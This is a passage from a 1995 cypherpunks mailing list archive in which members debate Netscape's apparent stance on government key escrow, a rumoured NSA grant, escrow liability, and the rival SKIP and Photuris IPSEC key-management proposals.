It's not even so much their caving that disgusts -- it's the hypocrisy. It's the lack of balls to say, "Guess what?  We got a most unusual visit by so-and-so who spoke unofficially for so-and-so, who wants us to know that we'll be toast if we push this issue of strong crypto."

It's as if someone you know suddenly takes up living with the creepy-crawlies in dark, damp places under rocks. One day you lift a rock and discover them there with some surprise, but instead of emerging or explaining, they say, "I like it here! This is the proper way to live!" and pull the rock back into place. It's not natural.

rjc wrote:

> What's the point? Surely Clark must realize that even if 
> Netscape adds key escrow to SSL/Secure Courier, it is still 
> possible to tunnel

and

> The genie is out of the bottle.

The Feds' approach to this kind of thing will be to make circumvention of escrow punishable by, say, a $10 million fine and 30 years in prison, with a teensy little provision that it doesn't matter how it comes to their attention.  That way, you not only run the risk that they find out by virtue of you having become a target of authorized eavesdropping, you run the risk that a, um, mistaken or, er, collateral eavesdrop reveals that your communications are circumventing escrow.

People in Montana and Nevada probably once thought the highway speed genie was out of the bottle, but all it took was fuel-shortage hype to enact a law effectively instituting a "national" speed limit, even though federal control of travel on roads outside federal reservations is wholly without constitutional authority.  

Most people have some contact with issues of cars, gasoline, speed, and fuel economy, yet there was barely a whimper. How likely is it that more than a few percent of the population will even grasp what is being done to them with key escrow and the PR flim-flam that will be used to spackle over the real issues?

jsw wrote:

> Please don't give up on us yet.

I have.  I'll reconsider when Jim reveals who inoculated him with GAK juice and when Netscape own up to how they caved and publicly disavow the position he advanced.

> All press accounts I've read so far have lots of stuff 
> attributed to Jim, but very little of it is actual quotes. 
> There appears to be lots of paraphrasing and interpretation 
> being done on the part of the reporters.  The impression that 
> I'm getting is that the press has blown a couple of small sound 
> bites way out of proportion.

Not to be overly dramatic, but this sounds like a non-policy German expatriate might have sounded in the late 1930's, trying to quell alarm over reports of atrocities filtering out of the Reich. It may be well-intentioned, but it's out of the loop.

> The infoworld article that covers the same speech only 
> devotes about 20% of the article to the key escrow topic, 
> and is similarly devoid of actual quotes.

This is the "turd in the punchbowl" principle, Jeff. Suppose your Presidential candidate sounded fine in 95% of his coverage, and only in 5% is he reported to advocate raising human children on farms for organ harvest? How big a turd does there have to be in the punchbowl before you will consider the punch unfit to drink? "Well, hell! There's only the ONE, and it's not even as big as the ice cubes!"  Right.

> I have not spoken to Jim about this, 

Uh-huh...

> and I did not hear the talk myself, 

Uh-huh...

> so I'm mostly reading between the lines here.  

Uh-huh.

> After I saw the story earlier today I started asking around 
> to see if the company had made any major policy shift in the 
> direction of GAK, and wasn't able to turn up anything.

So we're supposed to operate on the same blind faith you display. Right.

> My feelings about key escrow, which were echo'd by several 
> folks in management when I spoke to them today are...

Jeff, what you're revealing is a bit of confusion with respect to who runs the company. With all due respect, and taking your statements at face value without reading subterfuge into them, I believe you're in the dark, and positioned to get a hard lesson in real world corporate politics. Do you like your job? Do you have a mortgage? If this doesn't go down the way you think it's going, will YOU tell all?

> I don't want to go down in history as a facilitator of the 
> totalitarian state, and I don't think anyone else here does either.

Dark periods of history are full of well-intentioned people who, in the crunch, opted to save their own skins and facilitated whatever they were told to facilitate.

> ...and I hope everyone will judge us by what we do.

You can be sure of that. Meanwhile, if you really have principles, start taking names. Names, dates, places, things. If you're right, you can throw it all away later. If we're right, you'll have an opportunity to shed light on the process sometime down the road.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBML6LT0jw99YhtpnhAQF7IgIAhHkHuYNJ0ncTEw27ZLU4FUSYQoxNJdyy
Ki08cJka/nAyD/D4iQyYB5Y3Jmppb5okFr+UxvdYmS+RZYFnNLfy8A==
=mCuE
-----END PGP SIGNATURE-----











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Fri, 1 Dec 1995 20:49:43 +0800
To: cypherpunks@toad.com
Subject: nsa and netscape
Message-ID: <951201073154.60201e3d@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  The following came from a government source. I thought it might be of
  interest. 
                       Bob
--------------------------------------------------------------------------

     At yesterday's FNC  (Federal Networking Council) meeting it was 
     mentioned in passing that NSA has given Netscape a grant of $5 Million 
     (yes $5M) to beef up the security features of Netscape. More info will 
     be forthcoming on this.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 1995 19:01:01 +0800
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512021603.IAA00950@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote:
>
>  I think the gist
> of it is that if governments require key escrow, we will have to do it
> in order to sell our products with encryption into those countries.

Jim Clark wrote:
>> But if we do not come up with a solution to this problem that is
>> acceptable to each government, we will not be able to export our products,
>> except with a short key length (e.g. 40 bit keys), and that will not be
>> acceptable to corporate customers in other countries.

I read it as saying:  "Let us help the government invade the privacy
of our customers, so that the government will do us some favors in export 
licensing", rather than "Well if they stick it to us at gunpoint,
we will submit."

I would appreciate some further "clarification".

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 22:07:24 +0800
To: Jeff Hupp <jhupp@novellnet.gensys.com>
Subject: Re: "Got a subpoena?"
In-Reply-To: <26C7BF95B31@Novellnet.Gensys.com>
Message-ID: <Pine.BSF.3.91.951201084815.27648B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Jeff Hupp wrote:
> 	And at that point, you shut down the remailer and log each and every 
> bounce.
> 
> 	Now, they could get an order forcing you to run a remailer ~ but that 
> would open up a whole new can of worms i.e. can you be forced, under 
> court order, to commit a crime?

No.  I'm sure someone will come up with an exception, but generally no.   
You can't be drafted into the FBI.  Then there's the 13th amendment 
argument ...

EBD


> 
> -- 
> JHupp@gensys.com           |For PGP Public Key:
> http://gensys.com          |finger jhupp@gensys.com
> Autocracy is based on the assumption that one man is wiser
> than a million men.  How's that again?  I missed something.
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 1 Dec 1995 22:12:47 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512010307.WAA18467@homeport.org>
Message-ID: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Adam Shostack wrote:

> 
> 	One thing that stockholders do care about is liability.  It's
> my (non lawyerly) opinion that anyone implementing GAK without a
> government mandate to do so is opening themselves up to huge liability
> the Clipper database of keys gets out.

Well that would depend on the terms of the agreement to hold the escrowed 
keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
write the agreement so that it says, in essence, "we will try really 
really hard not to let the keys out, but if they get out, our only 
liability is to say 'Ooops' followed by a heartfelt apology!"

EBD


> 
> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 1 Dec 1995 16:19:57 +0800
To: cypherpunks@toad.com
Subject: Re: A challenge ...
Message-ID: <199512010800.JAA00893@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>I've been challenged to try to find a bank account; I win the challenge
>if I can wire in $100 to the hidden account.  Anyone have any good
>ideas about how to find an ABA number?

      This sounds like the "this is your last chance to send me $1!" ad:

      Announcing the 'Bank Account' Hack. 
      Rules: Wire me $100. 
      Reward: I'll give you a T-shirt.

      The *real* challenge will be getting your $100 back.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RobL <robl@on-ramp.ior.com>
Date: Sat, 2 Dec 1995 03:14:01 +0800
To: OpsAn@gnn.com (Michael Coates)
Subject: [NOISE]Re: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <m0tLYrM-000RuGC@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:08 PM 11/30/95, Michael Coates wrote:
>Found this interesting too.  US Position?
>
>AUTHOR A VIRUS, GO TO JAIL
>A computer cracker last week became the first virus writer sentenced to a
>jail term under Great Britain's Computer Misuse Act.  The 26-year-old
>perpetrator was sentenced to 18 months in jail after pleading guilty to 11
>charges connected with placing virus-infected programs on computer bulletin
>boards.  (Investor's Business Daily 29 Nov 95 A6)

Gak.. glad I don't live in G.B. as I have had as many as 700 virii available
for download on my BBS.. wonder how long it will be  before they start to
prosecute authors for writing buggy software ;)

------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 02:56:00 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: Barring access to Netscape
In-Reply-To: <Pine.SOL.3.91.951201002746.2186B-100000@chivalry>
Message-ID: <199512011706.JAA26955@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The field is User-Agent. However, blocking access to users of Navigator 
> isn't a particularly useful thing to do. If you must do something, why 
> not modify your GET handler to add a header to the start of all html 
> pages informing people of the problem, and suggesting alternatives. 

	I haven't modified my GET, but at the top of all the standard
c2.org web pages (http://www.c2.org/) if you are using pre-1.12
netscape, it barfs at you with a nasty message. I plan on adding a
line for all netscape browsers, with a link to Lance's page, once it
is ready. (Maybe it is ready now, I just haven't looked yet.)

> 
> Someone else [I can't remember, but I'll call them Alice] claimed that the
> security problems showing up were part of a deliberate conspiracy.  To
> anyone who knows anything about the history of these things knows how
> absurd this is. The principals at Netscape are a nice bunch of really
> guys, but were not really up to speed on issues like security and
> networking- for example, the first incarnation of SSL had an RC4 stream
> running with no checksumming whatsoever. The security problems that
> resulted are due to the learning curve.
> 
> Simon
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 01:55:55 +0800
To: fstuart@vetmed.auburn.edu (Frank Stuart)
Subject: Re: Barring access to Netscape
In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
Message-ID: <199512011708.JAA27113@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> >
> >Shouldn't be too hard to hack this into Apache.

	Should my commercial release of Apache/SSL include this? ;-)
(I could make it into a configuration option, so that if the
User-Agent is Mozilla, it passes back a Refresh: header with the
response....)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 2 Dec 1995 02:06:39 +0800
To: BRUEN@mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science)
Subject: Re: nsa and netscape
In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <199512011709.JAA27184@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	"beef up". "Yeah, Skipjack is much more secure than RC4-40..."

> 
> 
>   The following came from a government source. I thought it might be of
>   interest. 
>                        Bob
> --------------------------------------------------------------------------
> 
>      At yesterday's FNC  (Federal Networking Council) meeting it was 
>      mentioned in passing that NSA has given Netscape a grant of $5 Million 
>      (yes $5M) to beef up the security features of Netscape. More info will 
>      be forthcoming on this.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 2 Dec 1995 02:06:58 +0800
To: cypherpunks@toad.com
Subject: CPunks in the news: St. Jude
Message-ID: <199512011712.JAA29020@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives
several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk.
Evidently she has a new book coming out (Girls with Modems?).

	Jim Gillogly
	Sterday, 11 Foreyule S.R. 1995, 17:11




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Fri, 1 Dec 1995 23:50:25 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <m0tHeeN-0008zTC@pacifier.com>
Message-ID: <199512011529.JAA27678@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> said:

JW> jim bell wrote:

>> Here's a question: Why can't Netscape be released WITHIN THE US with
>> 128 bit keys?  Admittedly, it would probably...uh...escape within a
>> few hours, but that's no worse than what other cryptosystems
>> (best-known example, PGP) have done.

JW>   It is.  You can buy it from our home page, or from most computer
JW> stores.

	For Linux?

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 23:02:09 +0800
To: "cypherpunks@toad.com>
Subject: RE: Netscape gives in to key escrow
Message-ID: <01BABFD2.6307C180@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


JR wrote:

>With regard to all this waving about Netscape giving in to key escrow...
>
>First one question, and then some considerations. The question:
>
>- How much of Netscape stock is in the hands of Netscape? I mean in the hands

The original IPO was for 5 million shares. The vast
majority of the stock is not on the market yet. It's
owned/controlled by Clark et al, and presumably a
healthy share for the VC's (though I have no knowledge
of their participation).

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Sat, 2 Dec 1995 14:59:30 +0800
To: BRUEN@mitlns.mit.edu ("Bob Bruen, MIT Lab for Nuclear Science")
Subject: Re: nsa and netscape
In-Reply-To: <951201073154.60201e3d@mitlns.mit.edu>
Message-ID: <199512011553.JAA12735@spirit.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


//      At yesterday's FNC  (Federal Networking Council) meeting it was 
//      mentioned in passing that NSA has given Netscape a grant of $5 Million 
//      (yes $5M) to beef up the security features of Netscape. More info will 
//      be forthcoming on this.

This isn't all that surprising.  The NSA likes Fortezza, and Netscape has
announced that they will be supporting Fortezza based authentication. 
This was first made public in the SSL v3 draft circulated many months ago.

FORTEZZA support is virtually required for any sort of new network
authentication within the US DoD.  

The DoD pie is rather large, and I don't blame Netscape for trying to get
a piece of it.  One can support FORTEZZA without giving in to GAK for
non-FORTEZZA users.

-- 
david d `zoo' zuhn   ---  secure computing corporation
zuhn@sctc.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sat, 2 Dec 1995 03:16:51 +0800
To: "Bob Bruen, MIT Lab for Nuclear Science" <cypherpunks@toad.com
Subject: Re: nsa and netscape
Message-ID: <ace4efa601021004f8fe@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


Could we have a source or a confirmation of this? It is a conspiracy
theorist's wet dream, so I will reserve judgement until there is more
evidence that this is true.

        -Lance

At 4:31 AM 12/1/95, Bob Bruen, MIT Lab for Nuclear Science wrote:
>  The following came from a government source. I thought it might be of
>  interest.
>                       Bob
>--------------------------------------------------------------------------
>
>     At yesterday's FNC  (Federal Networking Council) meeting it was
>     mentioned in passing that NSA has given Netscape a grant of $5 Million
>     (yes $5M) to beef up the security features of Netscape. More info will
>     be forthcoming on this.

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 2 Dec 1995 04:00:15 +0800
To: cypherpunks@toad.com
Subject: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
Message-ID: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Brian Davis wrote:

> Well that would depend on the terms of the agreement to hold the escrowed 
> keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> write the agreement so that it says, in essence, "we will try really 
> really hard not to let the keys out, but if they get out, our only 
> liability is to say 'Ooops' followed by a heartfelt apology!"

<IANAL>
This sounds like the fine print you "agree" to by opening commercial software
packages. Hasn't this been found void in a couple of places? The "OK"  or 
"I Agree" buttons I'm forced to press (but you don't *have* to download 
software, nya,nya,nya...) when downloading wares also comes to mind.
Has this been tested in a court? (Sega's reverse engineering suit from 
a while back comes to mind)

Pressing buttons is hardly the same as your notarized handwritten signature
on paper (we prefer blood, it's more permanent), or its digital equivalent.
Mere tokenism, not insurance. 
</IANAL>

About JR's concern about Netscape's shareholders, they're playing a bubble
market and they know it. I wish them all the money and luck; luck is 
something they're gonna need if this is to go on.

Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
netscape). 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 1 Dec 1995 23:51:23 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512010549.VAA27874@blob.best.net>
Message-ID: <9512011509.AA13878@outland>
MIME-Version: 1.0
Content-Type: text/plain



> Is there any way one could set up a dirty pictures web
> page in such a fashion that it would be difficult, painful,
> and impractical to get at the pictures through that page
> with a netscape browser?

	Well, going back to the LiveScript thread, it looks as
if one could very easily write a small LiveScript prog to immediately
bounce NS users on to another page (such as the "Christian" Coalition's
manifesto on why you shouldn't be able to look at the stuff in the
first place :).  Hummm, let's see how bored I get at lunch time 
today :).

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 2 Dec 1995 02:56:54 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511301616.IAA18452@infinity.c2.org>
Message-ID: <199512011629.KAA28071@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Miszewski <crypto@midex.com> said:

MM> On Thu, 30 Nov 1995, sameer wrote:

s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
s> until February, at least, of course..) You don't have to answer that
s> to me, or the list, just think about it, and answer it for yourself.
s> Do you think "anyone else" there would leave, as you say below that
s> they don't want to go down history, etc...

MM> While this would go over well in the press if handled right please
MM> let everyone remember that Jeff is a real person with bills to pay
MM> and food to put on at least his own table.

	I believe that was the point: How many people at Netscape would
put principled opposition to GAK ahead of expediency?  My guess?  Not
enough.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Sat, 2 Dec 1995 14:55:17 +0800
To: jmhayes@netcom.com (Jordan Hayes)
Subject: Re: A challenge ...
In-Reply-To: <199512010735.XAA04851@netcom14.netcom.com>
Message-ID: <30bf2dac4d6f002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Jordan Hayes said:
> 
> I've been challenged to try to find a bank account; I win the challenge
> if I can wire in $100 to the hidden account.  Anyone have any good
> ideas about how to find an ABA number?

Depends on what information you have. You looking for a Bank Name/ABA #
lookup, or the other way around?

-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 2 Dec 1995 03:06:05 +0800
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.BSF.3.91.951201085245.27648C-100000@mercury.thepoint.net>
Message-ID: <199512011533.KAA19471@homeport.org>
MIME-Version: 1.0
Content-Type: text


Brian Davis wrote:

| On Thu, 30 Nov 1995, Adam Shostack wrote:

| > 	One thing that stockholders do care about is liability.  It's
| > my (non lawyerly) opinion that anyone implementing GAK without a
| > government mandate to do so is opening themselves up to huge liability
| > the Clipper database of keys gets out.

| Well that would depend on the terms of the agreement to hold the escrowed 
| keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
| write the agreement so that it says, in essence, "we will try really 
| really hard not to let the keys out, but if they get out, our only 
| liability is to say 'Ooops' followed by a heartfelt apology!"

	I'm not sure that's true.  Allow me to argue by analogy.

	A car company, hearing the FBI's laments about cars being used
as getaway vehicles after bank robberies, starts a program of putting
explosives in all their cars, with radio detonators.  In an
unfortunate accident, some of the explosives go off for no reason,
injuring the owner of the car, etc, etc.  It seems to me that the car
maker would be quite liable for doing something stupid (putting
explosives in the engine block), even though they didn't cause the
explosion.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 2 Dec 1995 03:01:10 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: I Agree buttons, GAKzilla & liability.
In-Reply-To: <Pine.3.89.9512010932.A35746-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951201104429.11481A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


FWIW:

A guy from the Wall Street Journal was on the CNN biz show this morning 
explaining all the reasons why Netscape's stock value was supported only 
by religious belief.

This may have a depressing effect on the stock value, as well as the 
morale of Netscape's major stockholders.

bd


On Fri, 1 Dec 1995 s1113645@tesla.cc.uottawa.ca wrote:

> On Fri, 1 Dec 1995, Brian Davis wrote:
> 
> > Well that would depend on the terms of the agreement to hold the escrowed 
> > keys, wouldn't it?   And presumably the GAK keyholder will have lawyers 
> > write the agreement so that it says, in essence, "we will try really 
> > really hard not to let the keys out, but if they get out, our only 
> > liability is to say 'Ooops' followed by a heartfelt apology!"
> 
> <IANAL>
> This sounds like the fine print you "agree" to by opening commercial software
> packages. Hasn't this been found void in a couple of places? The "OK"  or 
> "I Agree" buttons I'm forced to press (but you don't *have* to download 
> software, nya,nya,nya...) when downloading wares also comes to mind.
> Has this been tested in a court? (Sega's reverse engineering suit from 
> a while back comes to mind)
> 
> Pressing buttons is hardly the same as your notarized handwritten signature
> on paper (we prefer blood, it's more permanent), or its digital equivalent.
> Mere tokenism, not insurance. 
> </IANAL>
> 
> About JR's concern about Netscape's shareholders, they're playing a bubble
> market and they know it. I wish them all the money and luck; luck is 
> something they're gonna need if this is to go on.
> 
> Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time 
> netscape). 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 02:40:22 +0800
To: fletch@ain.bls.com (Mike Fletcher)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <9512011509.AA13878@outland>
Message-ID: <9512011550.AA06928@all.net>
MIME-Version: 1.0
Content-Type: text


> > Is there any way one could set up a dirty pictures web
> > page in such a fashion that it would be difficult, painful,
> > and impractical to get at the pictures through that page
> > with a netscape browser?
> 
> 	Well, going back to the LiveScript thread, it looks as
> if one could very easily write a small LiveScript prog to immediately
> bounce NS users on to another page (such as the "Christian" Coalition's
> manifesto on why you shouldn't be able to look at the stuff in the
> first place :).  Hummm, let's see how bored I get at lunch time 
> today :).

How about a LiveScript bathing suit that covers up the interesting parts
of the picture and replaces them with a statement that because they are
supporting Netscape's (whatever), this part of the picture has been
blanked along with information on where they can get an alternative
free browser that will show the rest of the picture. 


-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 02:21:23 +0800
To: markson@osmosys.incog.com (Tom Markson)
Subject: Re: SKIP source release is out
In-Reply-To: <9512010919.AA29567@monster.incog.com>
Message-ID: <199512011613.LAA08608@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Markson writes:
> > Doug Hughes writes:
> [ Perry Metzger writes: ]
> > > >SKIP is a non-standard being pushed by Sun.
> > >
> > > Correct me if I'm wrong, but isn't sun trying to make it a standard
> > > (in competition with Photuris) ?
> 
> Doug, you are correct.  SKIP is an IPSEC internet draft.  Photuris is
> an IPSEC internet draft.  Perry is incorrect in saying that SKIP is 
> a non-standard.   Both of the chairs of the IPSEC group have said SKIP 
> is part of the IPSEC working group.

Yes, and I believe that it has also been made pretty clear that you
have a snowball's chance in hell of getting SKIP to be a first class
standard.

Anything can be part of the IPSEC working group if it insists, you
know. Anyone can publish an RFC, too. 

> Phil Karn (author of Photuris) has also said this.

Other people are substantially more diplomatic than me.

> Both SKIP and Photuris are on the standards track.

No, I think that SKIP is pretty clearly headed, at best, to
elective. It isn't ever going to be a standard, period.

> > The IETF has many sorts of standards. It explicitly has a way to
> > standardize things that the IETF doesn't think are a good idea but
> > which should have the ability to interoperate if you do them.
> 
> That's true, but SKIP is not in that category.

Think what you like.

> > My opinion is that it is fairly clear that Photuris is the key
> > management system people will be using, although it is going to have
> > to evolve to work with a real network wide certificate database
> > infrastructure. SKIP isn't going to be the standard.
> 
> Again, in *your* opinion.  No determination has been made that I know of.

Actually, Ran pretty much explicitly said in Danvers that we were
headed towards Photuris and Photuris-like protocols. I know he's a bit
more diplomatic about how he says such things, but again, I think that
the situation is fairly clear, no matter what you guys choose to tell
the trade press.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Sat, 2 Dec 1995 02:51:43 +0800
To: cypherpunks@toad.com
Subject: Re: key escrow compromise
In-Reply-To: <199511302339.PAA01778@netcom5.netcom.com>
Message-ID: <199512011721.LAA28534@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> said:

	The gist of the whole thread is that voluntary key escrow is
acceptable, mandatory key escrow, which GAK apparently is, is very evil.

VZN> in other words, we agree that the government does have the
VZN> authority to link people to their "official numbers", but we have a
VZN> choice about when to use those official numbers in any private
VZN> communication, and by law businesses do not ever have to *require*
VZN> authentication in this way.  the numbers of course would be
VZN> required in communication between the individual and government.

VZN> the situation is that the government *now* requires that it knows
VZN> who we are when we communicate with it in any official
VZN> context. therefore I submit that the above system would not take
VZN> away any rights, and in fact might lead to privacy advocates being
VZN> able to use a massive government key-infrastructure but still
VZN> retain communication privacy.  in other words, you now have the
VZN> government actually supporting your cryptographic freedom by giving
VZN> you a massive "official" key distribution system you can use any
VZN> way you like.

	No, you are not required to identify yourself to the government
when communicating with it in all situations.  Certainly, there are many
situations when you are required to do so, but there are numerous
channels in which anonymity is permitted, and sometimes even
guaranteed.  Ironically, most of these are in law enforcement/public
safety situations (anonymous tips, whistleblowing, etc).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Fri, 1 Dec 1995 09:16:30 +0800
To: cypherpunks@toad.com
Subject: Q: Legal liability for Certification Authority
